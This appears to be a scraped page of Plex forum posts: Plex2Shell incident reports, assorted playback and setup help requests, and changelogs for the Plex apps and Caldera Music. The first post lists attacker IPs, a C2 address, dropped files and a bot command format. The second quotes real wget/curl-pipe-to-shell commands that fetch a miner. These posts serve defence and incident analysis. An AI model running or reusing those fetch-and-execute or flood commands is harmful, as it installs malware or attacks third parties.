Discussion Another Plex2Shell hit, mine was a DDoS bot

There's already been a post about old Plex servers getting popped by Plex2Shell (miner + proxy). Mine got hit too, but it dropped a DDoS bot instead, so adding the details.

Internet kept dropping Sunday night/monday morning. Plex was being told to flood other people and maxed out our upload every time.

I was on 1.43.0. I run staged updates, get ntfy alerts for new images, and Plex was deliberately held. In May 1.43.1 broke direct play on our Samsung Frame, Plex acknowledged the bug, so I pinned VERSION= to the last good build with a weekly reminder to retest. The reminder only checked whether the Samsung bug was fixed. It never flagged that 1.43.3 was a security fix, so the hold kept me on a vulnerable version.

If you hold back any app for a bug, make sure security releases still get your attention.

FYI:
- in from 94.154.43.88 on 32400, then called back to it on 8952
- /tmp/.pxb (its own curl/wget), /tmp/.px_7c1e
- bot at /tmp/.spid (self-deletes, shows as "cron"), copy at /var/tmp/kworker + kworker.sh
- C2 176.65.149.82:48101, backup hand.genddos.st
- plain text orders like `!ATK 179 udpplain 80 <ip> 53 len=1400`
- sha256 a654ffc9ea1d3af1cb07feeefe8ee078a0faaaf60b31aa20cfbe082d6c22696c

Look for a Plex child process called "cron", junk in /tmp or /var/tmp in the container, or TranscoderH264Options in Preferences.xml that's present but empty. The hunt script at github.com/code-zm/plex2shell is worth running.

Fixed with 1.43.4, a container rebuild and blocking the IPs. Change your Plex password too, it steals the owner token.

Help My plex got hacked and they embedded a miner, couple of questions

I don't need help with fixing the issue, I'm trying to figure out how they embedded it and how it triggers. So far I've figured out that they must have configured the media scanner to start their process. See the below snippet, you can see the media scanner PID is 24194 which is spawned from the default plex application from the systemd service configuration. Then all the sh commands come from that. So, my main question is, where can I find how the media scanner is configured? Something in it's configuration is creating these shell commands to try and pull down their miner.

plex 2248 1 0 08:36 ? 00:01:42 /usr/lib/plexmediaserver/Plex Media Server plex 24194 2248 0 11:37 ? 00:00:00 /usr/lib/plexmediaserver/Plex Media Scanner --match --type 8 --log-file-suffix Matcher --files @/tmp/4073-be72-5139-d6fd.txt --match-tag-mode=all plex 24197 24194 0 11:37 ? 00:00:00 /bin/sh -c wget http://217.60.194.116/plex -O-|sh plex 24198 24194 0 11:37 ? 00:00:00 /bin/sh -c (wget http://217.60.194.116/plex -O- || curl http://217.60.194.116/plex -o-)|sh plex 24199 24194 0 11:37 ? 00:00:00 /bin/sh -c (wget http://217.60.194.116/x -O- || curl http://217.60.194.116/x -o-)|sh plex 24200 24194 0 11:37 ? 00:00:00 /bin/sh -c (wget http://77.90.185.205/m/sh -O- || curl http://77.90.185.205/m/sh -o-)|sh

I have already blocked outbound network traffic to those 2 IP, and one of them is a known bot farm according to some quick searching.

  • [Android TV][Fire TV][tvOS] Improved focus when moving up and down through the Live TV guide.
  • [Android TV][tvOS][Fire TV] Lists can now be reordered.
  • [Android TV][tvOS][Fire TV] Live TV: Added side sheet for future airings on On Now / Up Next guide on TV.

  • [Android][iOS] Full-screen Libraries and Live TV source pickers.
  • [Android][iOS] Libraries are now shown as cards.

  • [Meta Horizon] Player: Watch side-by-side and top-and-bottom 3D videos.
  • [iOS] Ready for iPhone Duo: it gets the iPad layout and rotates freely when unfolded, and keeps clear of the side status bar when folded.

FIXES:

  • Credits links would sometimes improperly open the library browse screen with filters.
  • Episodes in collections were appearing as show posters instead of episode thumbnails.
  • Library title sort flipped to descending after applying filters, and started descending for episodes.
  • List headings on collections and playlists were not type aware.
  • Marking an item as watched sometimes would not update the continue watching hub.
  • Mentions in Popular Discussions showed as plain text instead of highlighted usernames
  • Photo playlists appeared in Playlists, and opening one showed an error until the app was restarted.
  • Player: Changing display mode, landscape lock or nerd statistics could undo a change to boost dialog, normalize loudness or auto-sync subtitles, or the other way around, after restarting the app.
  • Player: Changing the sleep timer duration could still stop playback at the earlier time.
  • Scheduling a recording from the live TV guide reloaded the whole guide.
  • Some hubs on collection screens didn’t have a sufficient gap above them
  • The Add to List button did not work on list details screens.
  • [Android TV] Fixed the app freezing during playback on some Google TV devices.
  • [Android TV] Player: Playback paused itself right after starting when refresh rate or resolution switching was turned on.
  • [Android TV][Fire TV] Entering a profile PIN with the remote number keys no longer changes the channel on some TVs.
  • [Android TV][Fire TV] Fixed a crash on startup on some Android TV devices without Google Play Services.
  • [Android TV][Fire TV] Moving up quickly in All Libraries no longer jumps back to the top of the list.
  • [Android TV][Fire TV] Player: A Live TV channel could keep playing in the background after leaving the app.
  • [Android TV][Fire TV][tvOS] Changing a Plex Home user’s Live TV & DVR access closed the restrictions menu before the change could be saved.
  • [Android TV][Fire TV][tvOS] Details pages for over-the-air shows showed empty episode placeholders and nothing was focused.
  • [Android TV][Fire TV][tvOS] Details pages opened while browsing without an account focus the action bar again.
  • [Android TV][Fire TV][tvOS] Opening a filter like Genre now focuses the selected value, or the first one, straight away instead of flickering the highlight.
  • [Android TV][Fire TV][tvOS] Pressing down from an activity card now focuses its first button instead of the More button.
  • [Android TV][Fire TV][tvOS] The radio button on the highlighted option in privacy settings was hidden.
  • [Android TV][tvOS][Fire TV] Focus would move incorrectly on servers in the all libraries list.
  • [Android TV][tvOS][Fire TV] Live TV guide rows could reload and lose focus after closing a menu or while scrolling.
  • [Android TV][tvOS][Fire TV] The app asked for your PIN after 5 minutes without input, even while a video was paused.
  • [Android] The app could crash while downloads were in progress.
  • [Android] The app could crash while playing downloaded content.
  • [Android][Android TV][Fire TV] Fixed a crash when an ad break starts during free movies and shows.
  • [Android][Android TV][Fire TV] Player: The app could freeze after quickly backing out of a Live TV show while its preview was playing.
  • [Android][Android TV][Fire TV] The app could crash when changing a star rating.
  • [Android][Android TV][Fire TV] The app crashed after saving a user’s library access changes.
  • [Android][iOS] Downloads watched offline showed in play history at the time they synced instead of when they were watched.
  • [Android][iOS] Dropping an item while reordering a list no longer jumps the list back to the top.
  • [Android][iOS] Tapping the last star gave four and a half stars instead of five.
  • [Android][iOS] The music video icon on a track could overlap the track’s duration.
  • [Android][iOS][Android TV][tvOS][Fire TV] The jump bar showed only dots for albums sorted by Album Artist and for TV seasons and episodes sorted by Show.
  • [iOS] Player: The next video in the queue now plays when the phone is locked.
  • [iOS] The tab bar stretched across the full screen on iPad.
  • [iOS][Android] Managing a Plex Pass or Remote Watch Pass subscription opened the plans page instead of your account’s payments page.
  • [iOS][Android] The clear button was missing in the search field after tapping a recent search.
  • [iOS][tvOS] Fixed an incorrect animation on the side navigation.
  • [iOS][tvOS] Player: Theme music could play at full volume instead of the Theme Music volume setting.
  • [tvOS] Focus traversal was incorrect on the header of media details screens.
  • [tvOS] The empty DVR Schedule and Recording Priority screens had nothing focused.
  • [tvOS][Android TV][Fire TV] Fixed the Activity feed being cut off before the screen edges while scrolling.

Help Plex 2026.20.0 on Apple TV – black screen on DV + HDR10+ files, plain HDR10 still works

Anyone else getting this since the latest update?

Since 2026.20.0 landed on my Apple TV, I can't play any of my DV files anymore. Hit play, server starts sending data (I can see the network activity), but the screen just stays black. Nothing shows up in the Dashboard either, which is weird.

Plain HDR10 files play fine, same settings, no issue at all. It's only the files that have DV profile 8.1 + HDR10 + HDR10+ all in one. Example of one that fails: HEVC Main 10, 2160p 23.976, DV 8.1 (RPU, no EL), HDR10+ present, AC3 5.1. The one that works is a 3840x1608 HDR10-only file with EAC3.

My TV is a Samsung, so no Dolby Vision support, it should just fall back to HDR10 like it always did before this update. Not sure yet if it's the DV or the HDR10+ part that's breaking it, I don't have a file with only one of the two to test.

Stuff I already tried:
- Turning Match Dynamic Range off: still black
- Forcing a transcode: can't really, the quality menu only goes down to 1080p now, which kind of defeats the point for 4K HDR

Setup in case it matters: PMS 1.43.3.10896 in Docker on Debian, Apple TV 4K gen3 on tvOS 27.0, output set to 4K HDR10 50Hz, match dynamic range and frame rate both on.

Is this a known bug in 2026.20.0 or is it just me? Any workaround apart from switching to Infuse?

Help Making a throwback Christmas channel with my library

I was hoping someone could point me in the right direction on this, I want to make a throwback Christmas channel to use after Halloween. I was hoping to have some old 80s/90s/2000s christmas commercials and Christmas episodes/movies going.

What is the easiest way to do this? I have seen a lot of apps on here that emulate tv but I am not sure which one fits best. I don't really care to have a fancy guide or anything because I am only planning on setting up the one channel for now.

I'd also like to know what the best way to add these to my library would be. I am planning on adding holiday episodes from shows I don't already have in my plex library and I'd prefer to not have them show up in my regular plex app if there is only one episode of the show there. I am running out of storage so this will all be pretty minimal

edit: forgot to mention but I typically stream from the vizio tv app but also use a PS5. I have a firestick and an onn streaming box I can use if their aren't options for the tv or console.

Discussion New version doesn't stop playback if tv is turned off(google streamer)

This new version on google streamer keeps the stream going if the Tv is turned off, previous versions stopped the playback..

I noticed in Tautulli that my daughter which were supposed to be sleeping was watching in bedroom, the stream was ongoing. So had to go and turn on tv and log in to my account. That made her stream stop.

Help Reading about the Plex hack - a question for a light user.

As someone who only really uses Plex in the most basic of ways - having it open on my laptop so I can watch downloaded stuff on my PS5 on my local network - I'm not in any danger, right? The issue has to do with actual plex servers and whatnot?

I just want to be clear since everyone is talking about servers and all that.

Help Is T-Mobile throttling Plex traffic or is it me?

I really need another set of eyes on this because I'm tapped out.

The setup: I have a server running on Windows at my home, I have a cable ISP. The server is NOT on TMobile Home Internet.

The problem: Content buffers and straight up won't play when accessing it on T-Mobile's network using Plex apps. This affects my cellular connection and one of my user's home connection (They use T-Mobile Home Internet).

Troubleshooting: Movie and Show libraries DO load in the apps.

I haven't been able to troubleshoot my user's connection directly but the common thread is TMobile thus far. The symptoms are the exact same.

I had another user test with their Verizon cellular connection, works just fine.

When I use a VPN on my phone content loads just fine at Original quality.

Streaming locally is just fine.

Streaming remotely from another ISP (not TMobile) works just fine.

I disabled relay - same issue.

Double checked remote access settings - Plex report's it's fully accessible.

The cry for help: I almost never stream using my data connection on TMobile and my user using TMobile home internet doesn't use my server very often either so I can't pinpoint when this started but I know for a fact at some point in the past things DID work just fine.

I hope someone can help point me in the right direction. I could use a hail marry suggestion at this point to just give me something to try.

Help Plex Remote Access keeps going offline until I toggle it off and on

Hi everyone,

I'm running Plex Media Server on Synology nas, with no VPN.

Remote Access randomly turns off when I'm outside my network and stays unavailable until I turn it off and back on again when I'm in local network.

Toggling it restores the connection, but the problem keeps returning. Both internet connections are good, and Plex was previously working fine remotely.

Has anyone experienced this?

Thanks!

Help Help with artwork errors

• Upvotes

My Plex app was updated on my Shield, and now some background art seems to be broken in the "continue watching" section. Some of the shows on my continue watching shelf display the incorrect background art (the default art) rather than my carefully selected art, but when viewing the show in the TV library the artwork is the correct one I chose.

Anyone know how to fix this? I've tried refreshing metadata and rebooting etc. Also have tried using the Plezy app post-Plex-update, and I like it but not enough to switch.

Thanks!

Discussion What is the community's thoughts and opinions about the audio normalization feature rolled out recently, as well as the "Boost Dialogue" option?

So I'm just now trying out the normalization feature on the Roku client app with Star Trek TNG DTS soundtrack from the blurays. I've always found those to have really loud highs for the score and sound effects compared to the rest of the soundtrack, so I'm checking it out on my decent 5.1 cerwin vega HT system. This is a feature I'd always hoped for and I haven't formed my opinion yet... but it does seem to be working. What does everyone else think of it? I haven't tried the Boost Dialogue feature at all yet. I've been a fan of normalization since the days of downloading anime fansubs from IRC channel FTP sites in the early 2000s. Some soundtracks are fine and some cry out for a nice leveling.

What do you all think of it? I'd really appreciate hearing all sorts of opinions on both these new(ish?) features. I'll edit/post my own final opinion once I had more experience with it. Thx!

Help Problem installing Plex on a win10 laptop

I had plex running off my PC a few years ago. I moved and now I'm trying to setup plex on a laptop. I've deleted all references to plex on all my PC & laptors. Everytime I try to install the current plex dowload It just hangs for days and never comes back. I'm wondering if my plex account is the cause. Any help would be appreciated. Thanks

Help Playback fails, server becomes unusable

I don't know how to describe the issue accurately beyond the title. There are a few video files that when Plex tries to play them, even direct play, it fails and Plex becomes unsuable for an hour or so. I try to reboot the server manually and it still doesn't work for an extended period of time. I have recreated the issue in the Apple TV app, but we started experiencing it on the Roku app initally. My wife has mentioned it happens on the Fire TV app as well.

Running Windows 11. Latest update. This with some of the other issues that have cropped up the last couple of years has me ready to take a sledgehammer to the machine and move on, but any help for a total tech novice is appreciated!

Discussion Watched Indicators no longer showing number of episodes on Season cards

I don't think I'm just missing a setting somewhere, I have Watched Indicators enabled for my TV Shows library because its helpful to see which episodes are unwached.

The new update appears to no longer show how many episodes are Unwatched on the poster card for an individual season; It only shows a checkmark if the entire season has been watched. Why in the world was that removed? The whole Show still shows how many total episodes are unwatched, why remove that info from the individual seasons? It's frustrating to need to go into each season and scroll through to find or see how many episodes might be unwatched.

News Caldera Music v1.2.0-beta.2 Released

Caldera v1.2.0-beta.2

This beta is mostly about sound. The audio engine that every Caldera player shares gains a set of new tools, set from the apps or from Plexamp’s settings for the player:

  • A Limiter, on by default, that catches peaks without delaying the audio.
  • Room correction from a REW (or similar) filter and AutoEQ headphone profiles, uploaded straight from Plexamp’s settings. Correction adds no delay, so grouped rooms stay in step.
  • Headphone crossfeed, and dither for 16- and 24-bit DACs.

The latest beta of Plexamp can also now show visualizers for music playing on another Caldera player, in time with what that room hears.

A beta of every Caldera player:

  • Headless v1.2.0-beta.2
  • Amp v1.2.0-beta.2 (macOS, Windows, Linux)
  • Apple TV v1.2.1 (build 45), TestFlight
  • Google TV v1.2.0 (versionCode 21), Play beta

The Apple TV and Google TV builds reach testers once Apple and Google finish reviewing them.

New

  • A Limiter setting, on by default, keeps loud passages from clipping when EQ, crossfeed or room correction push them past full scale, without delaying the audio or touching anything quieter.
  • Loudness Leveling gains a Preamp setting (0 to +6 dB, +4 by default), as in Plexamp.
  • Room correction: a filter from a measurement tool such as REW, loaded from Caldera Amp’s settings or uploaded through Plexamp’s settings for the player (or caldera-music --set-file on a headless player), corrects that room’s speakers with no added delay, so grouped rooms stay in step.
  • AutoEQ headphone profiles: a ParametricEQ.txt imported in Caldera Amp’s settings or uploaded through Plexamp’s becomes an EQ preset and is applied, and saved presets can be chosen from an EQ Preset setting in every app.
  • A Headphone Crossfeed setting (Mild, Medium or Strong) blends a little of each channel into the other ear, so hard-panned stereo stops sounding like it is inside your head.
  • Music played through a 16- or 24-bit DAC is dithered, so quiet passages and fade-outs keep their detail instead of turning gritty; a Dither setting turns it off. (Headless, Amp)
  • The disk cache can be turned Off (cache.diskLimitBytes=off): music streams with nothing written to disk, and Sweet Fades shorten to fit what RAM holds. (Headless)
  • New cache.memoryBufferBytes setting limits how much RAM each playing track may use (default 20 MB). (Headless)
  • New log.toFile setting turns off the log files in the config directory, for players that already log to the system journal. (Headless)
  • Plexamp can show visualizers for music playing on another player, in time with what that room hears.
  • A Release Device When Group Paused setting lets rooms in a group keep the audio device while the group is paused. (Headless, Amp)

Fixed

  • Loudness leveling now matches Plexamp: tracks Plex has analysed play at the same level as in Plexamp instead of about 4 dB quieter, and quiet recordings are no longer turned up.
  • Music played through a 16-bit DAC no longer crackles when EQ pushes a loud passage past full scale, and untouched 16- and 24-bit music reaches a DAC of the same depth unchanged. (Headless, Amp)
  • A player on a computer that also runs Plexamp or another Plex app shows its own track and state to the group, instead of the other app’s.
  • Fixed a rare stall where music went silent partway through a track and stayed silent until skipped.
  • Fixed an occasional crash shortly after changing the audio output device.
  • With a small disk cache limit, a track too big to fit plays without being written to disk, instead of filling the disk past the limit.
  • The disk cache limit holds while music downloads, instead of only being enforced after each track finishes.
  • The disk cache limit takes any size from 32 MB up, such as 64MB or 256000000, instead of resetting sizes not in its list to 512 MB. It is now cache.diskLimitBytes; the old name still works. (Headless)
  • Fixed an occasional crash when the player shuts down. (Headless, Amp)
  • Playing or resuming after handing the audio device to another service takes it back, instead of showing as playing in silence. (Headless)
  • Restarting no longer grabs the audio device for a paused session; it waits until you press play. (Headless)
  • A play that waited on a busy audio device and was paused now asks your integration hook again next time, instead of timing out. (Headless)
  • Music a managed user plays from Plexamp now shows up in their own play history instead of the owner’s.
  • Playback no longer stops dead at a short track (about a minute or less) with the progress stuck at 0:00.
  • Every room in a paused group lets go of the audio device after the idle timeout, like a paused player on its own, so AirPlay or another service on the same device can play, and comes back in step when the group plays again. (Headless)
  • A group’s audio gets priority on Wi-Fi networks that support it, so a busy download on the same network is less likely to make a room stall or slip out of step.
  • Log times on a device without a clock battery, such as a Raspberry Pi, match the real time instead of lagging by however far the clock was off at startup. (Headless, Amp)
  • Plexamp’s settings for a headless player no longer list the device hooks and busy-device wait meant for platform integrators, and setting them on the device with caldera-music --set takes effect while it runs instead of being lost. (Headless)
  • Seeking in a long DSD track is instant, and seeking back no longer plays garbled sound until the next seek.
  • A room that loses its connection for a moment snaps back in step with the group, instead of drifting and echoing against it for up to half a minute.
  • Caldera Amp’s media cache stays within the size shown in Settings, instead of growing without limit until that setting was changed. (Amp)
  • Plexamp’s settings for this player show the values it is actually using, such as its sample rate, and a change made in either Plexamp or the app shows up in the other. (Amp, Apple TV, Google TV)
  • The Library’s Recently Added, and every other sort, picks up new music when you come back to it or to the app, instead of only after a force stop. (Apple TV, Google TV)

Help Updated my server, now can't playback DVR Recordings

I had this once a while ago but it was a fraction less important as I didn't have many recordings compared to now.

For some reason sometimes when I upgrade my server some of my DVR Recordings just stop playing back, the client shows it gets to about 13% then the spinner loops a few times and goes to playback failed.

The odd thing seems to be that items recorded after the server update are then fine, it's only those pre-update.

I have Jellyfin installed alongside as a backup and that then plays them fine. But others in my household prefer Plex's UI.

Anyone else experienced similar?

Clients are Roku Streaming Stick 4Ks, as an example it's even done it on episodes of the same TV Series. One recorded Friday crashes, one recorded today is fine. I upgraded yesterday evening.

Codecs, Permissions etc are all identical.

Discussion Trying Infuse for the first time using our AppleTV 4k. I don’t think it likes my Plex libraries.

I’ll start off by saying Infuse seems like a great product. My Apple TV works great and plays everything I throw at it. I was just curious what all the hype was about with infuse and had $16 burning a hole in my pocket.

My plex libraries are on two separate machines. My main server is 120+ TB of all my 1080p files. My NAS is much larger, with all the full remuxes and what not. Everything on my main server has a better version on my NAS and that allows me and my users to choose which version they want to watch.

Plex only shows one poster per movie or show. Then, it allows the user to choose which version.

Infuse seems to be showing 2 posters for most everything.

Ultimately it doesn’t really matter.

I was just wondering if there was a way to merge those files or if I was stuck with the clutter due to having files on two separate machines with two separate quality profiles?

Any help would be greatly appreciated.

Help New to plex and having a tech issue

So recently I set up my plex server. I’m using a PC tower that’s sole function is to run plex and handbrake. I have all of my media saved on an external hard drive.

For the first couple of weeks everything played fine with no issues. I was able to watch my stuff on my tv, phone, laptop, and at other people’s houses.

Starting a couple of days ago I can only watch it sporadically with it buffering constantly on my tv and on others TVs, but plays fine on my phone and on the pc that’s running everything.

Anyone got any advice?

Discussion New update fixed my Roku TV!

I know the latest update is getting a ton of flack, but the latest update has fixed my Roku TV. Following the previous update, Plex wouldn’t work on the Roku. No problem on my Apple TV, but when trying to play on the Roku TV, the movie or show would just buffer (spin with percentages increasing, then rest to zero and spin back up to 99%, repeat). Or start playing then immediately buffer.
Tested this week after the latest update and everything is working again! Have watched a couple different movies, all without issue!
